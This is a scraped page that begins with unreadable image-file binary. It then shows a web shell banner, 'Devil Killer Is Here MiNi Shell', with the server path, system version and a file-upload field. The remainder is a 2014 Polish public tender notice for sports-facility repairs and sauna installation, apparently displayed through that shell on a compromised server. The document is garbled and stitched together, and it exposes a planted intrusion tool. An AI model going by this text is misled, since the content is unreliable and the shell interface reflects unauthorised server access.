JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/138521-N-2014.html

<p class="kh_header"><b>Piotrków Trybunalski: REMONT  OBIEKTÓW OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM:
- BUDYNKU CENTRUM REKREACYJNO - REHABILITACYJNEGO UL.  BELZACKA  108/110  
- OGRODZENIA BOISKA UL. ZAWIŁA 37
- BUDYNKU HALI RELAX AL. 3 MAJA 6B
ORAZ DOSTAWA I MONTAŻ SAUNY W BUD.  HALI RELAX AL. 3 MAJA 6B

Część 1
REMONT  OBIEKTÓW OSiR W PIOTRKOWIE TRYBUNALSKIM:
- BUDYNKU CENTRUM REKREACYJNO - REHABILITACYJNEGO UL.  BELZACKA  108/110  
- OGRODZENIA BOISKA UL. ZAWIŁA 37
- BUDYNKU HALI  RELAX  AL. 3 MAJA 6B

Część 2
DOSTAWA I MONTAŻ SAUNY W BUDYNKU HALI RELAX AL. 3 MAJA 6B W  PIOTRKOWIE TRYBUNALSKIM</b><br>
<b>Numer ogłoszenia: 138521 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji , al. 3 Maja 6b, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 7326569, 7326651, faks 44 732 65 69 wew. 122.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osirpt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT  OBIEKTÓW OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM:
- BUDYNKU CENTRUM REKREACYJNO - REHABILITACYJNEGO UL.  BELZACKA  108/110  
- OGRODZENIA BOISKA UL. ZAWIŁA 37
- BUDYNKU HALI RELAX AL. 3 MAJA 6B
ORAZ DOSTAWA I MONTAŻ SAUNY W BUD.  HALI RELAX AL. 3 MAJA 6B

Część 1
REMONT  OBIEKTÓW OSiR W PIOTRKOWIE TRYBUNALSKIM:
- BUDYNKU CENTRUM REKREACYJNO - REHABILITACYJNEGO UL.  BELZACKA  108/110  
- OGRODZENIA BOISKA UL. ZAWIŁA 37
- BUDYNKU HALI  RELAX  AL. 3 MAJA 6B

Część 2
DOSTAWA I MONTAŻ SAUNY W BUDYNKU HALI RELAX AL. 3 MAJA 6B W  PIOTRKOWIE TRYBUNALSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1
REMONT  OBIEKTÓW OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM:
- BUDYNKU CENTRUM REKREACYJNO - REHABILITACYJNEGO 
  UL.  BELZACKA  108/110  
- OGRODZENIA BOISKA UL. ZAWIŁA 37
- BUDYNKU HALI  RELAX  AL. 3 MAJA 6B

1.	Remont budynku Centrum Rekreacyjno-Rehabilitacyjnego przy ul. Belzackiej 108/110.
2.	Remont ogrodzenia boiska przy ul. Zawiłej 37.
3.	Remont budynku hali  Relax  przy Al. 3 Maja 6B.
4.	Remont pomieszczenia pod archiwum w budynku hali  Relax  przy Al. 3 Maja 6B.
5.	Wykonanie aranżacji recepcji w  budynku hali  Relax  przy Al. 3 Maja 6B.
6.	Remont budynku hali  Relax  przy Al. 3 Maja 6B - naprawa świetlików.
7.	Wykonawca udzieli minimum 12 miesięcy gwarancji jakości na wykonany przedmiot zamówienia.
8.	Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
9.	Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarach, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych i projekcie aranżacji recepcji w Hali Relax, które stanowią załączniki do SIWZ.
10.	Termin wykonania zamówienia 42 dni od dnia podpisania umowy.
11.	 Wykonawca na podstawie Przedmiarów opracuje  sześć Kosztorysów Ofertowych na w/w roboty i dołączy Kosztorysy Ofertowe do Formularza Ofertowego.

Część 2

DOSTAWA I MONTAŻ SAUNY W BUDYNKU HALI RELAX AL. 3 MAJA 6B W  PIOTRKOWIE TRYBUNALSKIM
1.	Dostawa i montaż sauny
2. Wykonawca udzieli minimum 36 miesięcy gwarancji na wszystkie  wykonane roboty  budowlane, a na dostarczony i zamontowany sprzęt  obowiązywać będzie gwarancja producenta.
3. Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
4. Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarze i Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
5. Termin wykonania zamówienia 42 dni od dnia podpisania umowy.
6. Wykonawca na podstawie Przedmiaru opracuje  Kosztorys Ofertowy na w/w robotę i dołączy Kosztorys Ofertowy do Formularza Ofertowego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa wart. 22 ust. 1 ustawy należy przedłożyć:
Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 w związku z art. 22 ust. 1.-  Część 1 i Część 2.
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
dla Części 1 - Wykazu należycie wykonanych trzech robót budowlanych, o wartości minimum 190.000,00 zł brutto każda z robót i odpowiadających rodzajem przedmiotowi niniejszego zamówienia, tj. budowa, przebudowa, remont,  a dla    Części 2 - wykazu należycie wykonanych trzech robót budowlanych, o wartości minimum 30.000,00 zł brutto każda z robót i odpowiadających rodzajem przedmiotowi niniejszego zamówienia, tj. budowa lub montaż saun. 
Wykazy wykonanych robót w Części 1 i Części 2 dotyczą okresu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to tego okresu, wraz z podaniem adresu i nazwy poprzedniego zamawiającego, wartości zamówienia, miejsca wykonania oraz zakresu zamówienia i daty wykonania.
Do oferty należy dołączyć  dokumenty potwierdzające, że roboty zostały wykonane w sposób należyty oraz wskazujący, że zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - Część1 i Część 2.
W przypadku składania oferty przez Wykonawców, ubiegających się wspólnie o udzielenie zamówienia, wykaz może być złożony wspólnie lub oddzielnie przez Wykonawców.
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych - Część 1 i Część 2.
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
a) Kopii aktualnej, opłaconej polisy ubezpieczeniowej potwierdzonej za zgodność z oryginałem, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony z tytułu odpowiedzialności kontraktowej (niewykonanie lub nienależyte wykonanie zobowiązania) i cywilnej  na wartość co najmniej 190.000,00 zł (dotyczy tylko Części 1) i na wartość co najmniej 30.000,00 zł (dotyczy tylko Części 2).
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularza Ofertowego, - Część 1 i Część 2.
b) - sześciu Kosztorysów Ofertowych opracowanych przez Wykonawcę na podstawie     Przedmiarów - Część 1.
- Kosztorysu Ofertowego opracowanego przez Wykonawcę na podstawie  Przedmiaru - Część 2.
c)   - Oświadczenia Wykonawcy o udzieleniu minimum 12 miesięcy gwarancji jakości na wykonany przedmiot zamówienia -  Część 1.
- Oświadczenia Wykonawcy o udzieleniu minimum 36 miesięcy gwarancji na prawidłowo wykonane i odebrane roboty  budowlane, a na dostarczony i zamontowany sprzęt  obowiązywać będzie gwarancja producenta - Część 2.
d) Oświadczenie Wykonawcy o terminie wykonania robót budowlanych  42 dni od dnia podpisania umowy - Część 1 i Część 2,
e)	Wykonawcy korzystający z Podwykonawców, zobowiązani są wraz ze ofertą    dostarczyć:
e)1.  Oświadczenie Podwykonawcy o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 oraz ust. 2 - Część 1 i Część 2,
e)2. Oświadczenie Podwykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 w związku z art. 22 ust. 1.- Część 1 i Część 2,
e)3.  Aktualny odpis z właściwego rejestru , jeżeli odrębne  przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy - dla Podwykonawcy - Część 1 i Część 2, 
e)4. Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych - Część 1 i Część 2.
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
f)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - Część 1 i Część 2;
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - Część 1 i Część 2;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - Część 1 i Część 2;
- zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - Część 1 i Część 2;
- zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - Część 1                i Część 2.
g)   Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt f) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - Część 1 i Część 2.
 Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował  regułą: spełnia albo nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne  postanowienia umowy Zamawiający zawarł we wzorze umowy stanowiącym załącznik  do SIWZ.
2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy.
3.	Z zastrzeżeniem ust. 2 zmiany umowy będą mogły nastąpić w na?stępujących okolicznościach:
     a) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku należy rozumieć zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
-  o charakterze niezależnym od Stron,
-  którego Strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy      zachowaniu należytej staranności,
- której nie można przypisać drugiej Stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w   szczególności:
powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia,
b)	zmiany powszechnie obowiązujących przepisów prawa w zakre?sie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron,
c)	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w       umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie  
  umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu  jednoznacznej interpretacji jej zapisów przez Strony,
d) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie  za?warcia  umowy 
    okoliczność prawna, ekonomiczna lub techniczna, za którą  żadna  ze Stron nie 
    ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania 
   umowy,  zgodnie  ze  specyfikacją   istotnych  warunków  zamówienia  -   Zamawiający dopuszcza możliwość zmiany umowy,  w  szczególności  terminu realizacji zamówienia,
e) zmiany stawki VAT w razie ustawowej zmiany przepisów o VAT, stosownie do  zmian dokonywanych w tym zakresie,
f) wystąpi przedłużenie procedury przetargowej (przedłużenie, które wpłynie na zmianę terminu rozpoczęcia realizacji przynajmniej o jeden tydzień),
g)	wystąpi przedłużenie, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia, a  nie wynikających  z  przyczyn  leżących  po  stronie Wykonawcy,
h)	wystąpi konieczność zmiany formy zabezpieczenia należytego wykonania umowy (dotyczy w przypadku, kiedy Zamawiający żąda zabezpieczenia należytego wykonania umowy),
i) oznaczenia danych dotyczących Zamawiającego lub Wykonawcy,
j) zmiany Podwykonawcy,*
k) zmiany zakresu części zmówienia powierzonej Podwykonawcom,*
l) rezygnacji Podwykonawcy z udziału przy realizacji zamówienia,*
ł) zmiany podmiotu trzeciego, na zasobach którego polega Wykonawca wykazując spełnienie warunku udziału w postępowaniu, z zastrzeżeniem, że nowy podmiot lub wykonawca samodzielnie będzie spełniał warunki udziału w postępowaniu w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia.*
* Zapisy mają zastosowanie w przypadku realizacji przedmiotu umowy przy pomocy Podwykonawców.
4.   Okoliczności określone w pkt 3  niniejszego Rozdziału pod rygorem ich pominięcia, winny być potwierdzone notatką służbową, sporządzoną przez uprawnionego pracownika Zamawiającego. Zmiany wymagają sporządzenia stosownego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
